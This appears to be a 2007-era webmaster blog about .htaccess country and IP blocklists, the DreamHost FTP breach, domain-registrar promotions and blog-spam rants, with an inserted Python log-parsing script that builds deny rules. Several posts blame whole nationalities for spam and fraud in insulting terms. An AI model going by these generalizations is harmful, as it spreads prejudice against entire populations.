For those who don't know what .htaccess is: it is a per-directory configuration file used on Apache servers, on a per-website basis, to define who may or may not access all or parts of a website, and to rewrite requests for certain files, folders or URLs to other files, folders or URLs. You will notice that the file name has nothing before the period; it is just a period followed by htaccess. Files whose names begin with a period are hidden by default on Unix and Linux systems, which is why most FTP clients and file managers don't show them. Hidden files can be revealed with a "remote file mask" of -al (or -AL) in your FTP client, or with a "show hidden files" option on the file manager page of your website control panel. Your website may or may not already have a .htaccess file. If you upload with an FTP tool, set the remote file mask to -al and refresh the remote view to see whether .htaccess exists in your home, public_html or / directory (more info in the extended comments). Otherwise, look at your website's file manager, or the FTP tools in cPanel or another website control panel; there should be some option to reveal hidden files beginning with a period.

If you do not use an FTP Client to upload files, but are using a web-based control panel, it is entirely up to your web host as to whether or not you can view, alter, or upload .htaccess files.

Important Notice! Be careful when creating, editing, or pasting directives into a .htaccess file, because a single invalid directive, term or character, or an unescaped space in a regular expression, will cause a Server 500 error and lock everybody out of the website until the file is corrected over FTP (with login credentials). Apache writes the reason for the failure to the server's error log, which is the first place to look.

The blocklists that I am about to tell you about use the Apache module mod_access (renamed mod_authz_host in Apache 2.2; Apache 2.4 still accepts the same "order"/"deny from" directives through mod_access_compat), which is almost always available on Linux-based shared, VPS, semi-dedicated or dedicated hosting. Unfortunately, if your website is hosted on a Windows server you are out of luck, unless your host has installed, or is willing to install, the ISAPI_Rewrite module for you.

Assuming that your website is hosted on a Linux box running an Apache web server, and you are allowed to use a personal .htaccess file with mod_access - IP "deny from" directives, the following web pages may be of great help to you in blocking access from unwanted countries, ISPs or hostile servers that are trying to spam or exploit your server (or website).

First on the list is my first work in the field of blocking scammers from forums and auction sites: my Nigerian Blocklist. I have been and still am compiling this list of IP addresses assigned to Nigeria and most of its neighboring countries in Africa, from which Nigerian scammers and other African fraudsters have operated against forums and auction sites around the (non-African) world. It is extremely effective at denying access to anybody trying to reach your website from within Nigeria or other African countries, including via satellite Internet services. If you have a blog, auction site, or forum that is plagued by Nigerian scammers, try embedding my .htaccess directives into your .htaccess file, or create one by copying and pasting the contents of the one on my Nigerian Blocklist web page into a new plain text file (Notepad) and saving it as .htaccess. If your computer's operating system won't let you save a file with nothing before the period, save it as htaccess.txt, upload it to your server and rename it there to .htaccess. You will see an instant drop in the number of Nigerian scammers on your website.

The second blocklist deals with unwanted traffic coming from ISPs and servers within China, Korea and surrounding countries: my Chinese Blocklist. All of the same methods listed above apply to this mod_access "deny from" list. It can be copied and pasted into your .htaccess file just as the Nigerian list details show, or merged with that list inside a single set of <Files *> directives. Note that if you do business with anybody in China, Korea or neighboring countries, they will not be able to access your website unless you "poke a hole" in the list to let their IP address(es) in: because the lists use "order deny,allow," an "allow from <their address>" line placed in the same <Files *> section overrides any "deny from" range that covers it.

Lastly, I present for your viewing pleasure the Russia and Exploited Servers Blocklist. This list is growing faster than the other two because I am constantly hit by so many Russian-based blog and log spammers and server exploit attempts, from both shared and dedicated servers around the world. This blocklist contains a large number of IP addresses and CIDRs (IP ranges) from Russia, The Ukraine and other former Soviet Bloc countries, Turkey and Algeria, and from a huge number of exploited web servers, co-location server farms and hosting companies around the world. A web server has no business requesting pages from another server unless the two have some relationship (a feed reader, a pingback, a partner's script); the ones on this list are trying to hack or spam your server or websites and should be blocked.

All of these blocklists are still being added to or modified as new information is discovered about the sources of scams, spamming or hacking attempts from exploited servers. Each page has a button (under the bold last-modified date, before the directives) for you to use to sign up for alerts from the ChangeDetection bot, which will email a notice to you once a day, only on days that I have modified the blocklist you are monitoring. This is a free service that I use myself. Next to that button you will see a PayPal Donate button that I have placed there, where people who benefit from my voluntary work can show some financial appreciation. Any amount will be gladly accepted, with a $10 minimum please.

There are links to contact me for assistance or to provide input, on all of the blocklists, in the footer area.

Continue reading "Block spammers, scammers and hackers with our .htaccess blocklists" »


June 20, 2007

Steel Guitar Forum Server Offline Due To Cut T1 Cable

I am a member of and Moderator of the computers section of the Steel Guitar Forum, which has been offline since the morning of June 19 (2007). In an email exchange with the owner - b0b Lee - it was revealed that workers on the street outside of the server's location have accidentally cut his T1 line. AT&T will be repairing the line as soon as possible. SGF members may wish to use this time to practice their steel guitars, until the forum is back online.

The Steel Guitar Forum is a multi-section discussion forum for members only, most of whom are either amateur or professional pedal steel guitarists. I have been a member for a number of years, since I am also a professional pedal steel player. My section is the computers forum, of which I am the moderator and a strong contributor.

Anybody who plays any type of steel guitar (pedal, non-pedal, or lap steel), or a resophonic guitar is welcome to apply for membership at the SGF.

UPDATE: The SGF is now back online.


June 8, 2007

3500 FTP account passwords stolen from DreamHost database

DreamHost Status Blog Archive Security Breach

It seems that somebody has managed to hack into the customer database for FTP login passwords, at the DreamHost website hosting company. According to an email sent out to the affected Dreamhost customers, 3500 accounts seem to have been breached by a hacker, or hackers, using as yet unknown attack vectors.

According to the update posted by DreamHost, on June 7, this may be a combination of security breaches, including keyloggers that may have been installed onto the affected users' computers. That means that the same thing could affect users of other web hosting companies. So far the hack appears to be the addition of various iframe codes or links to porn sites, to all files containing the word "index" of the compromised accounts. The file extension does not matter; if you have a file containing the word "index" it will be a target of this hacker. This includes index files in sub-directories, or add-on domains hosted under the same master account. Therefore, all website owners are urged to download their index files and inspect them for unauthorized modifications. If you find any remove them and notify your hosting provider, and scan your own computers for spyware, keyloggers, or backdoor trojans.

In one blog post about this I read that at least one DreamHost customer had all of his "index" files overwritten completely with a page containing an iframe exploit, leading to a website that installs a Trojan Horse program.

There is a statement about this incident, from the DreamHost blog, in my extended comments...

If you are a DreamHost customer, and you have scanned your computer for security breaches and found none, and you were notified that your account was among those compromised, and you are looking for another web host, I use and recommend BlueHost Web Hosting. They offer huge amounts of disk space and data transfer, plus unlimited add-on domains, for those who need to host multiple domains at a low monthly rate. I have all of the details on my BlueHost page. I have been with them for over 6 months and have had very little downtime, well less than I used to experience with my previous web host. My server has not been hacked, although I see people trying to do so every day or two (by reading my raw access and error logs).

I am available to assist people whose websites and/or computers have been compromised by hackers, spyware, keyloggers, or other security threats. Please visit my home page for more information and links to my webmaster services and contact pages.

Continue reading "3500 FTP account passwords stolen from DreamHost database" »


May 25, 2007

Dotster New Domain Registrations at Half Price, May 26 - 28, 2007

Attention website owners!

If you have been thinking about registering a few new domain names, but were waiting until the price was "right," your moment has just arrived! Dotster Domain Registrars just announced a half price sale on new domain registrations, this coming Memorial Day Weekend, from May 26, through 28, 2007. Domains regularly priced at $14.95 will only cost you $7.48 per year, using my coupon code below.

Note that this only applies to brand new domain names, not renewals or transfers.

Particulars

Dates - May 26th, 27th, 28th

Discounted Extensions - .com, .net, .org, .biz, .us

Coupon Code: MDAY50

Bonus coupon code offer

Dotster also provides all manner of web hosting packages, from low cost shared hosting to VPS semi-dedicated, at very reasonable prices.

5 Free Domains with Any Dotster Web Hosting Package! Enter Coupon Code "5FORFREE"


March 20, 2007

March Madness Sale on Domains at Dotster

Yee Haw! Domain registrar Dotster, Inc. has just announced a March Madness sale on new and transferred domain registrations, from now until April 1, 2007. Dotster is allowing unlimited numbers of registrations and transfers at the low, low rate of only $7.00 each when you use coupon code MADNESS during checkout. The regular price for new domain registrations at Dotster is $14.95 per year, so you will save a whopping 53% on new registrations. Domain transfers are regularly $8.95, so you will save 22%, plus gain one extra year on the expiration date per domain transferred.

If you want to have a web presence you will need to have a domain registered with a recognized Registrar. Dotster is a leading ICANN-accredited registrar capable of registering your .com, .net, .org, .cc, .tv, .ws, .info, and .biz top level domain (TLD) names.

If you would like to learn more about Dotster's services, read my Dotster information page. I have been a happy Dotster customer for 7 years and won't even consider another registrar. Most of my Webmaster clients are also registered at Dotster. Dotster also offers fast and affordable custom web design.


March 7, 2007

Russian and Ukrainian Blog Spammers are STUPID!

< Begin Rant >
If you publish a blog (Weblog) using MovableType, I'm certain that you have learned that if you accept comments, or trackbacks, that you are going to attract blog spam (splog). I used to allow comments and trackbacks on my blog until I found that all of the comments and trackbacks were 100% spam, with links to sleazy websites. Being the curious, suspicious spam/scam hunter type person that I am, I began studying my raw access logs to see where this crap was coming from. I wasn't surprised when I discovered that most of the blog spam I was getting aimed at my blog was coming from a few IP addresses in the Ukraine and Russia. Normally I would consider Russians and Ukrainians to be educated, intelligent folks, but now I have to wonder if I was mistaken in that line of thought.

The reason I make such a harsh statement is because I have not allowed comments or trackbacks to be posted for a long time now (Turn Off Comments and Trackbacks), and when I did allow them I always moderated them and deleted spam comments; they were never posted. In an effort to curtail the continuing attempts to post spam to my blog I have even removed the files used to post comments and trackbacks to my MovableType blog. Still, every day, for hours at a time, idiots in Russia and the Ukraine keep trying to spam my blog, despite the fact that I clearly state that no comments or trackbacks are accepted, and the files that are required for them are gone. Every time these idiots POST a comment or trackback my server gives them a 403 Forbidden response, but they don't seem to care, or notice, or are too uneducated to understand that Access Denied means that their request failed to go through! So, growing tired of even giving them the courtesy of a 403 response, I am now redirecting all of these bullshit attempts to POST comments or trackbacks right back to the sender's own browser or web appliance; to 127.0.0.1. That should result in a Page Cannot Be Displayed or Server Cannot Be Located message on the program the idiots are using to try to spam me.

The blog spammers are even resorting to using hijacked proxies, on computers in other countries, but they all get the same message, since I block all such exploits in my .htaccess file. I wasn't born yesterday. I know how to block IP addresses, proxies and unwanted behavior or exploits on my server. I also know how to track the source to their ISP and report them for spamming.

If you run MovableType blogs on an Apache Server, and are interested in seeing in my solution to the problem of blocking blog spammers, read my extended comments.
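As an added example, not part of the original post or its extended comments: a small Python script that reads Apache combined access-log lines, counts POST attempts against MovableType's comment and trackback scripts per client IP, and renders an .htaccess deny list for the persistent offenders. The script paths /mt/mt-comments.cgi and /mt/mt-tb.cgi are assumed, and the log lines are constructed, not real traffic.

```python
"""Count blog-spam POST attempts per client IP in an Apache combined log.

Added example, not the original post's .htaccess solution. MovableType's
comment and trackback scripts are ASSUMED to live at /mt/mt-comments.cgi
and /mt/mt-tb.cgi; SAMPLE_LOG below is constructed, not captured traffic.
"""
import re
from collections import Counter

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Assumed endpoints that accept comment and trackback POSTs on this blog.
SPAM_TARGETS = ("/mt/mt-comments.cgi", "/mt/mt-tb.cgi")


def parse_line(line):
    """Return the log fields as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def spam_posts_by_ip(lines, targets=SPAM_TARGETS):
    """Map each client IP to its number of POSTs aimed at the comment/trackback scripts."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        # startswith() so a query string (e.g. mt-tb.cgi?__mode=ping) still matches
        if any(rec["path"].startswith(t) for t in targets):
            counts[rec["ip"]] += 1
    return counts


def offenders(lines, threshold=3):
    """IPs with at least `threshold` spam POSTs, most active first."""
    return [ip for ip, n in spam_posts_by_ip(lines).most_common() if n >= threshold]


def htaccess_deny_block(ips):
    """Render an Apache 2.2-style .htaccess deny list for the offending IPs."""
    if not ips:
        return ""
    body = "\n".join(f"Deny from {ip}" for ip in ips)
    return f"Order Allow,Deny\nAllow from all\n{body}\n"


# Constructed sample: one persistent spammer, one single-shot proxy, one real visitor.
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Mar/2007:03:14:01 -0500] "POST /mt/mt-comments.cgi HTTP/1.1" 403 209 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [07/Mar/2007:03:14:02 -0500] "POST /mt/mt-tb.cgi?__mode=ping HTTP/1.1" 403 209 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [07/Mar/2007:03:14:03 -0500] "POST /mt/mt-comments.cgi HTTP/1.1" 403 209 "-" "Mozilla/4.0"',
    '198.51.100.22 - - [07/Mar/2007:03:15:00 -0500] "POST /mt/mt-comments.cgi HTTP/1.1" 403 209 "-" "-"',
    '192.0.2.44 - - [07/Mar/2007:03:16:10 -0500] "GET /blog/index.html HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(htaccess_deny_block(offenders(SAMPLE_LOG)))
```

Pipe a real access log in via `spam_posts_by_ip(open("access_log"))` and raise the threshold to suit your traffic; a single stray POST is not worth a deny rule, a few hundred against a removed script is.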


February 27, 2007

Dotster $7 Domain Registrations - One Day Only - Feb 28, 2007

If you are a website owner, and are thinking about adding another domain name, Dotster.com is having a one day sale on all new domain registrations of the TLDs: .com, .net, .org, .biz and .us. For the 24 hour period beginning tomorrow, February 28, at 12:01 AM, through 11:59 PM, PST, all new Registrations are only $7.00 for one year! The regular price for these TLD registrations is $14.95/yr. That represents a savings of $7.95 bubba, and that ain't hay! Heck, at that price I'll grab a couple of new domain names and park them on my home page, or add them on to my BlueHost account, since they allow up to 5 additional domains to be hosted under one account, for free.

To grab your $7.00 domain go to Dotster.com on Feb 28 and use the coupon code: 7domain, when you place the order.

I have more information about Dotster Domain Registrar on my website. I also have a complete webpage about BlueHost, here.

Dotster is also offering coupon code discounts on a second year of web hosting (7hosting), and on their in-house website design services. Visit Dotster.com before March 1, 2007, for the details.


January 20, 2007

Domain Registrar - Liberty Names - Sends Misleading "Domain Name Expiration Notice"

If you own any Internet Domains you already know that they require a valid Domain Registrar to hold your registration information, before they can go live on a web host or server. I have had website domains since around the year 2000, and they have all been registered through the same Registrar; Dotster.

Today I received a deceptive letter in the mail from Liberty Names of America, apparently a Domain Registrar. At the top right, in large bold type it said: Domain Name Expiration Notice. After that, in small print, it stated: "As a courtesy, we would like to remind you that it's time to renew your domain name, which is expiring on April 27, 2007." Below that it listed one of my various domain names and a reply by date of March 14, 2007. The rest of the details in the letter are in small type, except for the parts where it outlines the renewal rates for 1, 2 and 5 years, and the place where the gullible would fill in their credit card details to "renew" their domain with these pirates.

As I stated in the first paragraph, Dotster, Inc. is and always has been my domain Registrar. Liberty Names Of America is harvesting the Whois records for as many domains as they can lookup, then sending out phony renewal notices to capture business away from the existing Registrars, by deceiving gullible recipients of these letters. To be fair, the letter does state, in small print, that they are not your current Registrar, and that they want you to transfer to them. The back side of the letter contains almost 7" of type that is so tiny that it requires a magnifying glass to read it. In that tiny type are the legal details and disclaimers for their transferring of your service.

As a reference to you all, I currently pay $14.95 per year (1 yr renewals) to maintain my domains at Dotster. Liberty Names is offering me the fabulous opportunity to transfer my domain away from $14.95 a year with Dotster to them, for the low rate of only $25.00! Hmmm. Simple math tells me that they are charging almost twice what Dotster charges for common TLD domain name registration. PIRATES! Take me off your mailing list, Liberty Names of America. You are slimeballs, just like DROA, who sends out similar Expiration Notices to domain owners. Are you the same slimeball company under a different name? Go F yourself!

Now that my tirade is over, if you really do need a decent domain registrar, one that won't dick you around, I recommend Dotster. For $14.95 you can register your domains, not the $25, or $35, or $40 per year that the ripoff registrars charge. They do have sliding reduced rates for 5 or 10 year renewals and charge only $8.95 to transfer your existing domain, plus they add one year to its expiration date.

Nuff said.


August 31, 2006

My Website Hosting Page Has Been Totally Revamped

I finally put the finishing touches on my revamped website hosting page, found at www.wizcrafts.net/hosting.html, on August 30, 2006. This is the first major overhaul of that page in many months.

The old page made a very brief mention about what hosting is and only scraped at the surface of the concept of different types of hosting accounts. It then went on to list the detailed features of a few select web hosting companies, with no mention of alternatives. To say the least, it was lacking in breadth of coverage.

The new hosting page is totally the opposite in how it presents information. The first half of the page contains reasonably detailed explanations about what website hosting is, what web servers are, and details the differences between dedicated, semi-dedicated, VPS and shared web hosting.

The next section explains domain name registration and registrars.

Following that I have embedded a comparison of over 20 shared-hosting companies, outlining their allowed disk space, bandwidth (data transfer), email or FTP accounts, add-on domains policies and pricing (monthly and annual). I have also created separate pages detailing the features of the various hosting plans, showing as many features as the company publishes online. Those pages contain links to the companies and to alternate services like VPS servers. I have not finished the features pages for all of the listed web hosts, but am in the process of creating new ones every day or two. I am also trying to keep the disk space/bandwidth/pricing up to date, as several companies are frequently changing their plans to respond to their competitors.

I also plan to include a voting script on each features page, in the immediate future. I look forward to your input to help rate the various hosts according to your own experiences with them (not hearsay).

The final section of the new hosting page deals with website promotion tools and has several very useful links to help you get listed or improve your online business prospects.

Please avail yourselves of this information, found at www.wizcrafts.net/hosting.html


May 19, 2006

Beware of DROA Domain Name Expiration Notice Postal Mailings

This is a heads-up warning to my fellow Domain owners to watch out if you get a letter in the mail from Domain Registry Of America, or some other Domain Registrar with whom you are not already affiliated as a customer.

Today I got a letter from Domain Registry Of America, addressed to my master account name used in the Whois Directory. The letter proclaims in large bold text:
Domain Name Expiration Notice
It then displays one of my Domain names that is due for renewal in 6 months and "As a courtesy to Domain name holders, we are sending you this notification ....."

Upon carefully reading the details they do make it clear that they are not your current Registrar, and want you to switch from your Registrar to DROA. They brag about only charging $30 for a one year renewal fee, and a bargain rate of only $50 for two years. There are checkboxes to place your order and a place to input your credit card numbers, which you would then mail in. There is a huge amount of information and disclaimers on the back of the letter that are in such a small font I had to get a magnifying glass to read it. I wouldn't transfer to these people if they were the last Registrar on earth.

If I were paying $35.00 a year for a Domain that would sound like a bargain, but I am a Dotster customer (see below), and only pay $14.95 per year for TLD Domains (or less if there is a special deal or Happy Hour Sale). If I were fooled into transferring to those people it would double the cost of renewing my Domains. Luckily I wasn't born yesterday.

Many Domains are owned by companies that have different people who know different details about the business, but not everything. These people are probably hoping that this letter will end up at Accounts Payable, where the secretary will call somebody to ask if they have a Domain that might need to be renewed, to which that person may say "I think so." Accounts Payable will pay the invoice by credit card and the company will have their Domain name transferred away from their current chosen Registrar by trickery, probably at increased expense.

I have seen other letters from other Registrars that never mentioned that they are not my current Registrar, asking for x amount of dollars to renew my expiring Domains. This is pure fraud, trying to get me to pay an invoice to a company with whom I have absolutely no relationship. If you do make the mistake of transferring your Domain to such a company you will probably never be able to get them to let you change back. Once a company like that gets your Domain name they make it almost impossible to transfer away from them. Legitimate Registrars have a simple method of locking and unlocking Domain transfers, with no fees (see below about Dotster).

As a Domain owner make it your business to know with whom your Domains are registered and what the renewal dates are for each Domain. Most Registrars with whom you are a customer will attempt to contact you by email first, to let you know 60 days in advance of a renewal date. Always check carefully when you receive a Domain renewal notice to be sure it is from the Registrar who holds that Domain for you.

My Recommended Registrar:

If you are paying more than $14.95 a year for your Domains take my recommendation and check out Dotster.com. Dotster is an ICANN Accredited Registrar and is above board all the way. They will not try to scam or trick you into unwittingly transferring a Domain to them. In fact, if you do transfer an existing Domain to Dotster they only charge $8.95 for the transfer and first year Registration, plus they extend your expiration date by an additional year. I have a lot more info about this on my Dotster web page. I have been a Dotster customer since the year 2000 and have never had a complaint about their services or methods of communications.


April 24, 2006

Register New Domains At Dotster.com

The Happy Hour $2.00 Domain name sale has expired, at Dotster.com. I'll let you know when the next one is announced.

If you need to register a new or additional Domain name, I recommend Dotster, which is my Registrar. TLDs go for $14.95 /yr, and transfers are $8.95 with one additional year added to your expiration date, and they have a limited time sale on .info Domains, for only $2.99 for one year.

Use this link to go to the Dotster home page and search for your desired Domain name(s).

Dotster is my registrar for all of my Domains, and most of my Webmaster Services customers use them as well. Dotster is an ICANN Accredited Registrar and has been around for quite a while now. I first learned about them from Leo LaPorte, on Tech TV. I have more details about their services on my Dotster web page, and on my web hosting page. Dotster accepts Domain registrations from people around the World.

I was there on the 26th and bought a new Domain name, www.computer-consulting-services.com and got a free .info with the same prefix. I'll be putting content on it over the next few weeks, but right now it is parked, waiting for my brain cells to wake up again. Watch my blog for details about this new Domain.

About the author
Wiz FeinbergWiz's Blog is written by Bob "Wiz" Feinberg, an experienced freelance computer consultant, troubleshooter and webmaster. Wiz's specialty is in computer and website security. Wizcrafts Computer Services was established in 1996.
Creative Commons License This weblog is licensed under a Creative Commons License.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.
Powered by Movable Type